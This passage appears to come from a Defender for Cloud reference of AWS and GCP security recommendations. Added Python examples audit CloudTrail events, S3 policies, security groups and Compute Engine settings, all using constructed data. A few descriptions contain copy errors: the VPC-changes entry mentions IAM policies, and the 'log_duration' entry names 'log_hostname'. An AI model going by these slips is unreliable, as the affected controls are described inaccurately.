Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for unauthorized API calls.

Monitoring unauthorized API calls will help reveal application errors and may reduce the time to detect malicious activity.

Recommendation: Ensure a log metric filter and alarm exist for usage of 'root' account
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for root login attempts.

Monitoring for root account logins will provide visibility into the use of a fully privileged account and an opportunity to reduce the use of it.

Recommendation: Ensure a log metric filter and alarm exist for VPC changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is possible to have more than one VPC within an account; in addition, it is also possible to create a peer connection between two VPCs, enabling network traffic to route between VPCs. It is recommended that a metric filter and alarm be established for changes made to VPCs.

Monitoring changes to IAM policies will help ensure authentication and authorization controls remain intact.

Recommendation: Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
Severity: High
Description: Security groups provide stateful filtering of ingress/egress network traffic to AWS resources. It is recommended that no security group allows unrestricted ingress access to port 3389. Removing unfettered connectivity to remote console services, such as RDP, reduces a server's exposure to risk.

Recommendation: Management ports of EC2 instances should be protected with just-in-time network access control
Severity: High
Description: Microsoft Defender for Cloud has identified some overly-permissive inbound rules for management ports in your network. Enable just-in-time access control to protect your Instances from internet-based brute-force attacks. Learn more.
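The "log metric filter and alarm" recommendations above all follow the same pattern: CloudTrail records are delivered to CloudWatch Logs, a metric filter matches the events of interest, and an alarm fires on the metric. The following added example expresses several of those filters (unauthorized API calls, console authentication failures, console sign-in without MFA, root account usage, CloudTrail configuration changes, security group changes, and disabling or scheduled deletion of CMKs) as Python predicates and runs them over constructed CloudTrail records, so the matching logic can be read and tested before it is turned into metric filter patterns. It is not Defender for Cloud's or AWS's code; the predicates are modelled on the commonly published benchmark filter patterns for these controls (an assumption, so compare them against the benchmark version you follow), and the sample events, user names and event IDs are constructed.

```python
import json
from typing import Callable, Dict, List

# One predicate per recommendation; each mirrors a CloudWatch Logs metric filter pattern.

def unauthorized_api_call(e: dict) -> bool:
    code = e.get("errorCode", "")
    return code.endswith("UnauthorizedOperation") or code.startswith("AccessDenied")

def console_auth_failure(e: dict) -> bool:
    return e.get("eventName") == "ConsoleLogin" and e.get("errorMessage") == "Failed authentication"

def console_login_without_mfa(e: dict) -> bool:
    # Successful console logins where MFA was not used (failed logins are covered above).
    return (e.get("eventName") == "ConsoleLogin"
            and e.get("responseElements", {}).get("ConsoleLogin") == "Success"
            and e.get("additionalEventData", {}).get("MFAUsed") != "Yes")

def root_account_usage(e: dict) -> bool:
    ident = e.get("userIdentity", {})
    # Exclude actions AWS services perform on the account's behalf.
    return (ident.get("type") == "Root" and "invokedBy" not in ident
            and e.get("eventType") != "AwsServiceEvent")

def cloudtrail_config_change(e: dict) -> bool:
    return (e.get("eventSource") == "cloudtrail.amazonaws.com" and e.get("eventName") in
            {"CreateTrail", "UpdateTrail", "DeleteTrail", "StartLogging", "StopLogging"})

def security_group_change(e: dict) -> bool:
    return (e.get("eventSource") == "ec2.amazonaws.com" and e.get("eventName") in
            {"AuthorizeSecurityGroupIngress", "AuthorizeSecurityGroupEgress",
             "RevokeSecurityGroupIngress", "RevokeSecurityGroupEgress",
             "CreateSecurityGroup", "DeleteSecurityGroup"})

def cmk_disable_or_delete(e: dict) -> bool:
    return (e.get("eventSource") == "kms.amazonaws.com"
            and e.get("eventName") in {"DisableKey", "ScheduleKeyDeletion"})

DETECTORS: Dict[str, Callable[[dict], bool]] = {
    "unauthorized-api-calls": unauthorized_api_call,
    "console-auth-failures": console_auth_failure,
    "console-sign-in-without-mfa": console_login_without_mfa,
    "root-account-usage": root_account_usage,
    "cloudtrail-config-changes": cloudtrail_config_change,
    "security-group-changes": security_group_change,
    "cmk-disable-or-delete": cmk_disable_or_delete,
}


def evaluate(log_lines: List[str]) -> Dict[str, List[str]]:
    """Map each detector to the eventIDs that would increment its metric (and so trip its alarm)."""
    hits: Dict[str, List[str]] = {name: [] for name in DETECTORS}
    for line in log_lines:
        event = json.loads(line)
        for name, matches in DETECTORS.items():
            if matches(event):
                hits[name].append(event["eventID"])
    return hits


# Constructed CloudTrail records, one JSON document per line as delivered to CloudWatch Logs.
SAMPLE_LOG = [
    json.dumps({"eventID": "ev-1", "eventType": "AwsConsoleSignIn", "eventSource": "signin.amazonaws.com",
                "eventName": "ConsoleLogin", "userIdentity": {"type": "Root"},
                "responseElements": {"ConsoleLogin": "Success"}, "additionalEventData": {"MFAUsed": "No"}}),
    json.dumps({"eventID": "ev-2", "eventType": "AwsConsoleSignIn", "eventSource": "signin.amazonaws.com",
                "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "alice"},
                "errorMessage": "Failed authentication", "responseElements": {"ConsoleLogin": "Failure"}}),
    json.dumps({"eventID": "ev-3", "eventType": "AwsApiCall", "eventSource": "ec2.amazonaws.com",
                "eventName": "DescribeInstances", "userIdentity": {"type": "IAMUser", "userName": "bob"},
                "errorCode": "Client.UnauthorizedOperation"}),
    json.dumps({"eventID": "ev-4", "eventType": "AwsApiCall", "eventSource": "cloudtrail.amazonaws.com",
                "eventName": "StopLogging", "userIdentity": {"type": "IAMUser", "userName": "bob"}}),
    json.dumps({"eventID": "ev-5", "eventType": "AwsApiCall", "eventSource": "ec2.amazonaws.com",
                "eventName": "AuthorizeSecurityGroupIngress", "userIdentity": {"type": "AssumedRole"}}),
    json.dumps({"eventID": "ev-6", "eventType": "AwsApiCall", "eventSource": "kms.amazonaws.com",
                "eventName": "ScheduleKeyDeletion", "userIdentity": {"type": "IAMUser", "userName": "carol"}}),
    json.dumps({"eventID": "ev-7", "eventType": "AwsApiCall", "eventSource": "ec2.amazonaws.com",
                "eventName": "DescribeInstances", "userIdentity": {"type": "AssumedRole"}}),
]

if __name__ == "__main__":
    for name, ids in evaluate(SAMPLE_LOG).items():
        print(f"{name}: {ids}")
```

Note that ev-1 trips two detectors at once (root usage and a console sign-in without MFA), which is exactly the overlap the two separate recommendations intend; the benign ev-7 matches nothing.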


Recommendation: RDS databases and clusters should not use a database engine default port
Severity: Low
Description: This control checks whether the RDS cluster or instance uses a port other than the default port of the database engine.

If you use a known port to deploy an RDS cluster or instance, an attacker can guess information about the cluster or instance. The attacker can use this information in conjunction with other information to connect to an RDS cluster or instance or gain additional information about your application.

When you change the port, you must also update the existing connection strings that were used to connect to the old port. You should also check the security group of the DB instance to ensure that it includes an ingress rule that allows connectivity on the new port.

Recommendation: RDS instances should be deployed in a VPC
Severity: Low
Description: VPCs provide a number of network controls to secure access to RDS resources.

These controls include VPC Endpoints, network ACLs, and security groups.

To take advantage of these controls, we recommend that you move EC2-Classic RDS instances to EC2-VPC.

Recommendation: S3 buckets should require requests to use Secure Socket Layer
Severity: Medium
Description: We recommend requiring requests to use Secure Socket Layer (SSL) on all Amazon S3 buckets.

S3 buckets should have policies that require all requests ('Action': 's3:*') to only accept transmission of data over HTTPS in the S3 resource policy, indicated by the condition key 'aws:SecureTransport'.

Recommendation: Security groups should not allow ingress from 0.0.0.0/0 to port 22
Severity: High
Description: To reduce the server's exposure, it is recommended not to allow unrestricted ingress access to port '22'.
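The bucket-level S3 Block Public Access control from the identity table earlier (the four flags that must all be true) and the Secure Socket Layer control just above (a bucket policy that denies every request when 'aws:SecureTransport' is false) can both be checked offline against the bucket configuration and policy document. The following is an added example, not Defender for Cloud's own evaluation code. It uses the flag names quoted on the page (ignorePublicAcls, blockPublicPolicy, blockPublicAcls, restrictPublicBuckets); the bucket name example-bucket, its ARN and both sample policies are constructed. Requiring the Deny statement to name the bucket and its objects (or "*") and to apply to every principal is this example's reading of "all requests", not a rule quoted from the page.

```python
import json
from typing import List

# Bucket-level Block Public Access flags, as named on the page; all four must be true to pass.
BPA_FLAGS = ("ignorePublicAcls", "blockPublicPolicy", "blockPublicAcls", "restrictPublicBuckets")


def block_public_access_failures(config: dict) -> List[str]:
    """Return the flags that are false or missing; an empty list means the control passes."""
    return [flag for flag in BPA_FLAGS if config.get(flag) is not True]


def _as_list(value) -> list:
    """Policy elements may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def requires_secure_transport(policy_json: str, bucket_arn: str) -> bool:
    """True when a Deny statement covers all S3 actions on the bucket and its objects,
    for every principal, whenever aws:SecureTransport is false."""
    policy = json.loads(policy_json)
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Deny":
            continue
        principal = stmt.get("Principal")
        if principal != "*" and principal != {"AWS": "*"}:
            continue
        condition = stmt.get("Condition", {}).get("Bool", {}).get("aws:SecureTransport")
        if not any(str(v).lower() == "false" for v in _as_list(condition)):
            continue
        if not any(a in ("s3:*", "*") for a in _as_list(stmt.get("Action"))):
            continue
        resources = set(_as_list(stmt.get("Resource")))
        if "*" in resources or {bucket_arn, bucket_arn + "/*"} <= resources:
            return True
    return False


# Constructed samples (not from any real account).
BUCKET_ARN = "arn:aws:s3:::example-bucket"

BPA_ALL_ON = {"ignorePublicAcls": True, "blockPublicPolicy": True,
              "blockPublicAcls": True, "restrictPublicBuckets": True}
BPA_PARTIAL = {"ignorePublicAcls": True, "blockPublicPolicy": False, "blockPublicAcls": True}

TLS_ONLY_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*", "Action": "s3:*",
    "Resource": [BUCKET_ARN, BUCKET_ARN + "/*"],
    "Condition": {"Bool": {"aws:SecureTransport": "false"}}}]})
READ_ONLY_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:role/reader"},
    "Action": "s3:GetObject", "Resource": BUCKET_ARN + "/*"}]})

if __name__ == "__main__":
    print("BPA failures:", block_public_access_failures(BPA_PARTIAL))
    print("TLS enforced:", requires_secure_transport(TLS_ONLY_POLICY, BUCKET_ARN))
```

A missing flag is reported the same way as one set to false, since the control fails on anything that is not explicitly true.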


Recommendation: Security groups should not allow unrestricted access to ports with high risk
Severity: Medium
Description: This control checks whether unrestricted incoming traffic for the security groups is accessible to the specified ports that have the highest risk. This control passes when none of the rules in a security group allow ingress traffic from 0.0.0.0/0 for those ports. Unrestricted access (0.0.0.0/0) increases opportunities for malicious activity, such as hacking, denial-of-service attacks, and loss of data.

Security groups provide stateful filtering of ingress and egress network traffic to AWS resources. No security group should allow unrestricted ingress access to the following ports:

- 3389 (RDP)

- 20, 21 (FTP)

- 22 (SSH)

- 23 (Telnet)

- 110 (POP3)

- 143 (IMAP)

- 3306 (mySQL)

- 8080 (proxy)

- 1433, 1434 (MSSQL)

- 9200 or 9300 (Elasticsearch)

- 5601 (Kibana)

- 25 (SMTP)

- 445 (CIFS)

- 135 (RPC)

- 4333 (ahsp)

- 5432 (postgresql)

- 5500 (fcp-addr-srvr1)


Recommendation: Security groups should only allow unrestricted incoming traffic for authorized ports
Description: This control checks whether the security groups that are in use allow unrestricted incoming traffic. Optionally the rule checks whether the port numbers are listed in the "authorizedTcpPorts" parameter.

- If the security group rule port number allows unrestricted incoming traffic, but the port number is specified in "authorizedTcpPorts", then the control passes. The default value for "authorizedTcpPorts" is 80, 443.
- If the security group rule port number allows unrestricted incoming traffic, but the port number is not specified in the "authorizedTcpPorts" input parameter, then the control fails.
- If the parameter is not used, then the control fails for any security group that has an unrestricted inbound rule.

Security groups provide stateful filtering of ingress and egress network traffic to AWS. Security group rules should follow the principle of least privilege. Unrestricted access (an IP address with a /0 suffix) increases the opportunity for malicious activity such as hacking, denial-of-service attacks, and loss of data. Unless a port is specifically allowed, the port should deny unrestricted access.
Severity: High

Recommendation: Unused EC2 EIPs should be removed
Description: Elastic IP addresses that are allocated to a VPC should be attached to Amazon EC2 instances or in-use elastic network interfaces (ENIs).
Severity: Low

Recommendation: Unused network access control lists should be removed
Description: This control checks whether there are any unused network access control lists (ACLs). The control checks the item configuration of the resource "AWS::EC2::NetworkAcl" and determines the relationships of the network ACL. If the only relationship is the VPC of the network ACL, then the control fails. If other relationships are listed, then the control passes.
Severity: Low

Recommendation: VPC's default security group should restrict all traffic
Description: Security group should restrict all traffic to reduce resource exposure.
Severity: Low
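The two security group controls above (high-risk ports, and authorized ports with and without the "authorizedTcpPorts" parameter), evaluated over security groups in the IpPermissions shape of the EC2 DescribeSecurityGroups API. This is an added example, not Microsoft's or AWS's code; the sample groups are constructed.

```python
# Added example (not Microsoft's or AWS's code): evaluate EC2 security groups
# against the two controls above, using the IpPermissions shape returned by
# the EC2 DescribeSecurityGroups API. Sample groups are constructed inline.
import ipaddress

# Ports the first control treats as high risk (the list above).
HIGH_RISK_PORTS = {3389, 20, 21, 22, 23, 110, 143, 3306, 8080, 1433, 1434,
                   9200, 9300, 5601, 25, 445, 135, 4333, 5432, 5500}
# Default value of the second control's authorizedTcpPorts parameter.
DEFAULT_AUTHORIZED_TCP_PORTS = frozenset({80, 443})


def _is_unrestricted(cidr):
    """True for 0.0.0.0/0 and ::/0 (any range with a /0 suffix)."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def unrestricted_ingress(group):
    """Return [(protocol, port)] for rules reachable from the whole internet.
    A port of None means the rule opens every port of that protocol
    (IpProtocol "-1", or a rule without a port range)."""
    found = []
    for rule in group.get("IpPermissions", []):
        cidrs = [r["CidrIp"] for r in rule.get("IpRanges", [])]
        cidrs += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
        if not any(_is_unrestricted(c) for c in cidrs):
            continue
        proto = rule.get("IpProtocol", "-1")
        low, high = rule.get("FromPort"), rule.get("ToPort")
        if proto == "-1" or low is None or high is None:
            found.append((proto, None))
        else:
            found.extend((proto, p) for p in range(low, high + 1))
    return found


def high_risk_ports_control(group):
    """Control 1: passes when no high-risk port is open to 0.0.0.0/0 or ::/0."""
    return not any(port is None or port in HIGH_RISK_PORTS
                   for _, port in unrestricted_ingress(group))


def authorized_ports_control(group, authorized_tcp_ports=DEFAULT_AUTHORIZED_TCP_PORTS):
    """Control 2: passes when every world-open port is an authorized TCP port.
    Pass authorized_tcp_ports=None to model the parameter not being used, in
    which case any unrestricted inbound rule fails the control."""
    exposed = unrestricted_ingress(group)
    if authorized_tcp_ports is None:
        return not exposed
    return all(proto == "tcp" and port in authorized_tcp_ports
               for proto, port in exposed)


# Constructed sample groups in DescribeSecurityGroups shape (not real data).
SG_WEB = {  # 80/443 from anywhere, SSH only from an internal range
    "GroupId": "sg-web-example",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}]},
    ],
}
SG_BASTION = {  # SSH and RDP open to the world: fails the high-risk control
    "GroupId": "sg-bastion-example",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ],
}
SG_ALL = {  # "All traffic" rule from anywhere: fails both controls
    "GroupId": "sg-all-example",
    "IpPermissions": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}],
}

if __name__ == "__main__":
    for sg in (SG_WEB, SG_BASTION, SG_ALL):
        print(sg["GroupId"], "high-risk:", high_risk_ports_control(sg),
              "authorized:", authorized_ports_control(sg))
```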


Next steps

For related information, see the following:

- Connect your AWS accounts to Microsoft Defender for Cloud
- What are security policies, initiatives, and recommendations?
- Review your security recommendations


Security recommendations for GCP resources - a reference guide

Article 06/27/2023

This article lists the recommendations you might see in Microsoft Defender for Cloud if you've connected a GCP project from the Environment settings page. The recommendations shown in your environment depend on the resources you're protecting and your customized configuration.

To learn about how to respond to these recommendations, see Remediate recommendations in Defender for Cloud.

Your secure score is based on the number of security recommendations you've completed. To decide which recommendations to resolve first, look at the severity of each one and its potential impact on your secure score.


GCP Compute recommendations

There are 26 GCP recommendations in this category.

Recommendation: Compute Engine VMs should use the Container-Optimized OS
Description: This recommendation evaluates the config property of a node pool for the key-value pair, 'imageType': 'COS'.
Severity: Low

Recommendation: Ensure 'Block Project-wide SSH keys' is enabled for VM instances
Description: It is recommended to use instance-specific SSH key(s) instead of common/shared project-wide SSH key(s) to access instances.

Project-wide SSH keys are stored in Compute/Project-meta-data. Project-wide SSH keys can be used to log in to all the instances within a project. Using project-wide SSH keys eases SSH key management, but if compromised, they pose a security risk that can impact all the instances within the project.

It is recommended to use instance-specific SSH keys, which can limit the attack surface if the SSH keys are compromised.
Severity: Medium

Recommendation: Ensure Compute instances are launched with Shielded VM enabled
Description: To defend against advanced threats and ensure that the boot loader and firmware on your VMs are signed and untampered, it is recommended that Compute instances are launched with Shielded VM enabled.

Shielded VMs are virtual machines (VMs) on Google Cloud Platform hardened by a set of security controls that help defend against rootkits and bootkits. Shielded VM offers verifiable integrity of your Compute Engine VM instances, so you can be confident your instances haven't been compromised by boot- or kernel-level malware or rootkits. Shielded VM's verifiable integrity is achieved through the use of Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring.

Shielded VM instances run firmware which is signed and verified using Google's Certificate Authority, ensuring that the instance's firmware is unmodified and establishing the root of trust for Secure Boot. Integrity monitoring helps you understand and make decisions about the state of your VM instances, and the Shielded VM vTPM enables Measured Boot by performing the measurements needed to create a known good boot baseline, called the integrity policy baseline.

The integrity policy baseline is used for comparison with measurements from subsequent VM boots to determine if anything has changed.

Secure Boot helps ensure that the system only runs authentic software by verifying the digital signature of all boot components, and halting the boot process if signature verification fails.
Severity: High


Recommendation: Ensure 'Enable connecting to serial ports' is not enabled for VM Instance
Description: Interacting with a serial port is often referred to as the serial console, which is similar to using a terminal window, in that input and output is entirely in text mode and there is no graphical interface or mouse support.

If you enable the interactive serial console on an instance, clients can attempt to connect to that instance from any IP address. Therefore interactive serial console support should be disabled.

A virtual machine instance has four virtual serial ports. Interacting with a serial port is similar to using a terminal window, in that input and output is entirely in text mode and there is no graphical interface or mouse support.

The instance's operating system, BIOS, and other system-level entities often write output to the serial ports, and can accept input such as commands or answers to prompts.

Typically, these system-level entities use the first serial port (port 1), and serial port 1 is often referred to as the serial console.

The interactive serial console does not support IP-based access restrictions such as IP whitelists. If you enable the interactive serial console on an instance, clients can attempt to connect to that instance from any IP address.

This allows anybody to connect to that instance if they know the correct SSH key, username, project ID, zone, and instance name.

Therefore interactive serial console support should be disabled.
Severity: Medium

Recommendation: Ensure 'log_duration' database flag for Cloud SQL PostgreSQL instance is set to 'on'
Description: Enabling the log_hostname setting causes the duration of each completed statement to be logged. This does not log the text of the query and thus behaves differently from the log_min_duration_statement flag.

This parameter cannot be changed after session start. Monitoring the time taken to execute the queries can be crucial in identifying any resource-hogging queries and assessing the performance of the server.

Further steps such as load balancing and use of optimized queries can be taken to ensure the performance and stability of the server.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low


Recommendation: Ensure 'log_executor_stats' database flag for Cloud SQL PostgreSQL instance is set to 'off'
Description: The PostgreSQL executor is responsible for executing the plan handed over by the PostgreSQL planner. The executor processes the plan recursively to extract the required set of rows.

The "log_executor_stats" flag controls the inclusion of PostgreSQL executor performance statistics in the PostgreSQL logs for each query.

The "log_executor_stats" flag enables a crude profiling method for logging PostgreSQL executor performance statistics which, even though it can be useful for troubleshooting, may increase the amount of logs significantly and have performance overhead.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low

Recommendation: Ensure 'log_min_error_statement' database flag for Cloud SQL PostgreSQL instance is set to 'Error' or stricter
Description: The "log_min_error_statement" flag defines the minimum message severity level that is considered an error statement. Messages for error statements are logged with the SQL statement.

Valid values include "DEBUG5", "DEBUG4", "DEBUG3", "DEBUG2", "DEBUG1", "INFO", "NOTICE", "WARNING", "ERROR", "LOG", "FATAL", and "PANIC". Each severity level includes the subsequent levels mentioned above.

Ensure a value of ERROR or stricter is set.

Auditing helps in troubleshooting operational problems and also permits forensic analysis.

If "log_min_error_statement" is not set to the correct value, messages may not be classified as error messages appropriately. Considering general log messages as error messages would make it difficult to find actual errors, and considering only stricter severity levels as error messages may skip actual errors to log their SQL statements.

The "log_min_error_statement" flag should be set to "ERROR" or stricter.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low


Recommendation: Ensure 'log_parser_stats' database flag for Cloud SQL PostgreSQL instance is set to 'off'
Description: The PostgreSQL planner/optimizer is responsible for parsing and verifying the syntax of each query received by the server. If the syntax is correct, a "parse tree" is built up; otherwise an error is generated.

The "log_parser_stats" flag controls the inclusion of parser performance statistics in the PostgreSQL logs for each query.

The "log_parser_stats" flag enables a crude profiling method for logging parser performance statistics which, even though it can be useful for troubleshooting, may increase the amount of logs significantly and have performance overhead.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low

Recommendation: Ensure 'log_planner_stats' database flag for Cloud SQL PostgreSQL instance is set to 'off'
Description: The same SQL query can be executed in multiple ways and still produce different results. The PostgreSQL planner/optimizer is responsible for creating an optimal execution plan for each query.

The "log_planner_stats" flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query.

The "log_planner_stats" flag enables a crude profiling method for logging PostgreSQL planner performance statistics which, even though it can be useful for troubleshooting, may increase the amount of logs significantly and have performance overhead.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low

Recommendation: Ensure 'log_statement_stats' database flag for Cloud SQL PostgreSQL instance is set to 'off'
Description: The "log_statement_stats" flag controls the inclusion of end-to-end performance statistics of a SQL query in the PostgreSQL logs for each query. This cannot be enabled together with the other module statistics ("log_parser_stats", "log_planner_stats", "log_executor_stats").

The "log_statement_stats" flag enables a crude profiling method for logging end-to-end performance statistics of a SQL query. This can be useful for troubleshooting but may increase the amount of logs significantly and have performance overhead.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low


Recommendation: Ensure that Compute instances do not have public IP addresses
Description: Compute instances should not be configured to have external IP addresses.

To reduce your attack surface, Compute instances should not have public IP addresses. Instead, instances should be configured behind load balancers, to minimize the instance's exposure to the internet. Instances created by GKE should be excluded because some of them have external IP addresses and cannot be changed by editing the instance settings. These VMs have names that start with "gke-" and are labeled "goog-gke-node".
Severity: High

Recommendation: Ensure that instances are not configured to use the default service account
Description: It is recommended to configure your instance to not use the default Compute Engine service account because it has the Editor role on the project.

The default Compute Engine service account has the Editor role on the project, which allows read and write access to most Google Cloud Services.

To defend against privilege escalation if your VM is compromised and prevent an attacker from gaining access to all of your project, it is recommended to not use the default Compute Engine service account. Instead, you should create a new service account and assign only the permissions needed by your instance.

The default Compute Engine service account is named [PROJECT_NUMBER]-compute@developer.gserviceaccount.com.

VMs created by GKE should be excluded. These VMs have names that start with "gke-" and are labeled "goog-gke-node".
Severity: High


Recommendation: Ensure that instances are not configured to use the default service account with full access to all Cloud APIs
Description: To support the principle of least privilege and prevent potential privilege escalation, it is recommended that instances are not assigned the default service account "Compute Engine default service account" with scope "Allow full access to all Cloud APIs".

Along with the ability to optionally create, manage and use user-managed custom service accounts, Google Compute Engine provides the default service account "Compute Engine default service account" for instances to access necessary cloud services.

The "Project Editor" role is assigned to "Compute Engine default service account"; hence, this service account has almost all capabilities over all cloud services except billing.

However, when "Compute Engine default service account" is assigned to an instance, it can operate in 3 scopes:

1. Allow default access: Allows only the minimum access required to run an instance (least privilege)
2. Allow full access to all Cloud APIs: Allows full access to all the cloud APIs/services (too much access)
3. Set access for each API: Allows the instance administrator to choose only those APIs that are needed to perform the specific business functionality expected by the instance

When an instance is configured with "Compute Engine default service account" with scope "Allow full access to all Cloud APIs", based on the IAM roles assigned to the user(s) accessing the instance, it may allow a user to perform cloud operations/API calls that the user is not supposed to perform, leading to successful privilege escalation.

VMs created by GKE should be excluded. These VMs have names that start with "gke-" and are labeled "goog-gke-node".
Severity: Medium


Recommendation: Ensure that IP forwarding is not enabled on Instances
Description: A Compute Engine instance cannot forward a packet unless the source IP address of the packet matches the IP address of the instance. Similarly, GCP won't deliver a packet whose destination IP address is different than the IP address of the instance receiving the packet. However, both capabilities are required if you want to use instances to help route packets.

Forwarding of data packets should be disabled to prevent data loss or information disclosure.

To enable this source and destination IP check, disable the canIpForward field, which allows an instance to send and receive packets with non-matching destination or source IPs.
Severity: Medium

Recommendation: Ensure that the 'log_checkpoints' database flag for Cloud SQL PostgreSQL instance is set to 'on'
Description: Ensure that the log_checkpoints database flag for the Cloud SQL PostgreSQL instance is set to on.

Enabling log_checkpoints causes checkpoints and restart points to be logged in the server log. Some statistics are included in the log messages, including the number of buffers written and the time spent writing them.

This parameter can only be set in the postgresql.conf file or on the server command line. This recommendation is applicable to PostgreSQL database instances.
Severity: Low
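The instance-level checks from the Compute table above (Shielded VM, serial console, project-wide SSH keys, public IP addresses, the default service account and its full-access scope, IP forwarding, with the GKE exclusion) applied to one Compute Engine instance resource. This is an added example, not Microsoft's or Google's code; the metadata keys, the shieldedInstanceConfig field names and the mapping of "Allow full access to all Cloud APIs" to the cloud-platform scope are assumptions about the Compute API, and the instances are constructed.

```python
# Added example (not Microsoft's or Google's code): evaluate a Compute Engine
# instance resource, in the JSON shape of compute.instances.get, against the
# instance-level recommendations above. Sample instances are constructed inline.
import re

# Email form of the default Compute Engine service account (from the page).
DEFAULT_SA_RE = re.compile(r"^\d+-compute@developer\.gserviceaccount\.com$")
# Assumption: the console option "Allow full access to all Cloud APIs" grants
# the cloud-platform OAuth scope.
FULL_ACCESS_SCOPE = "https://www.googleapis.com/auth/cloud-platform"
TRUE_VALUES = {"true", "1"}


def is_gke_node(instance):
    """GKE-created VMs (name 'gke-*' and label goog-gke-node) are excluded
    from the public-IP and service-account checks."""
    return (instance.get("name", "").startswith("gke-")
            and "goog-gke-node" in instance.get("labels", {}))


def metadata_flag(instance, key):
    """Read an instance metadata item as a boolean; absent counts as false."""
    for item in instance.get("metadata", {}).get("items", []):
        if item.get("key") == key:
            return str(item.get("value", "")).strip().lower() in TRUE_VALUES
    return False


def has_public_ip(instance):
    """An access config with a natIP means the NIC has an external address."""
    return any(cfg.get("natIP")
               for nic in instance.get("networkInterfaces", [])
               for cfg in nic.get("accessConfigs", []))


def default_sa_accounts(instance):
    """Service accounts on the instance that are the project default one."""
    return [sa for sa in instance.get("serviceAccounts", [])
            if DEFAULT_SA_RE.match(sa.get("email", ""))]


def shielded_vm_enabled(instance):
    """Secure Boot, vTPM and integrity monitoring all enabled (assumed field names)."""
    cfg = instance.get("shieldedInstanceConfig", {})
    return all(bool(cfg.get(k)) for k in
               ("enableSecureBoot", "enableVtpm", "enableIntegrityMonitoring"))


def evaluate_instance(instance):
    """Return {check: passed} for the recommendations on this page."""
    result = {
        "shielded_vm_enabled": shielded_vm_enabled(instance),
        # Assumed metadata keys behind the two console settings named above.
        "serial_console_disabled": not metadata_flag(instance, "serial-port-enable"),
        "block_project_ssh_keys": metadata_flag(instance, "block-project-ssh-keys"),
        "ip_forwarding_disabled": not instance.get("canIpForward", False),
    }
    if not is_gke_node(instance):
        defaults = default_sa_accounts(instance)
        result["no_public_ip"] = not has_public_ip(instance)
        result["not_default_service_account"] = not defaults
        result["no_full_access_scope"] = not any(
            FULL_ACCESS_SCOPE in sa.get("scopes", []) for sa in defaults)
    return result


# Constructed sample instances (not real resources).
RISKY_VM = {
    "name": "legacy-app-1",
    "canIpForward": True,
    "networkInterfaces": [{"accessConfigs": [{"type": "ONE_TO_ONE_NAT", "natIP": "203.0.113.10"}]}],
    "serviceAccounts": [{"email": "123456789012-compute@developer.gserviceaccount.com",
                         "scopes": [FULL_ACCESS_SCOPE]}],
    "metadata": {"items": [{"key": "serial-port-enable", "value": "true"}]},
}
HARDENED_VM = {
    "name": "app-2",
    "canIpForward": False,
    "networkInterfaces": [{"networkIP": "10.10.0.5"}],
    "serviceAccounts": [{"email": "app-2-sa@example-project.iam.gserviceaccount.com",
                         "scopes": ["https://www.googleapis.com/auth/logging.write"]}],
    "shieldedInstanceConfig": {"enableSecureBoot": True, "enableVtpm": True,
                               "enableIntegrityMonitoring": True},
    "metadata": {"items": [{"key": "block-project-ssh-keys", "value": "true"}]},
}
GKE_NODE = {
    "name": "gke-prod-pool-1-abc",
    "labels": {"goog-gke-node": ""},
    "networkInterfaces": [{"accessConfigs": [{"natIP": "203.0.113.11"}]}],
    "serviceAccounts": [{"email": "123456789012-compute@developer.gserviceaccount.com",
                         "scopes": [FULL_ACCESS_SCOPE]}],
}

if __name__ == "__main__":
    for vm in (RISKY_VM, HARDENED_VM, GKE_NODE):
        print(vm["name"], evaluate_instance(vm))
```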


Recommendation: Ensure that the 'log_lock_waits' database flag for Cloud SQL PostgreSQL instance is set to 'on'
Description: Enabling the "log_lock_waits" flag for a PostgreSQL instance creates a log for any session waits that take longer than the allotted "deadlock_timeout" time to acquire a lock.

The deadlock timeout defines the time to wait on a lock before checking for any conditions. Frequent overruns of the deadlock timeout can be an indication of an underlying issue.

Logging such waits on locks by enabling the log_lock_waits flag can be used to identify poor performance due to locking delays or whether a specially crafted SQL statement is attempting to starve resources through holding locks for excessive amounts of time.

This recommendation is applicable to PostgreSQL database instances.
Severity: Low

Recommendation: Ensure that the 'log_min_duration_statement' database flag for Cloud SQL PostgreSQL instance is set to '-1'
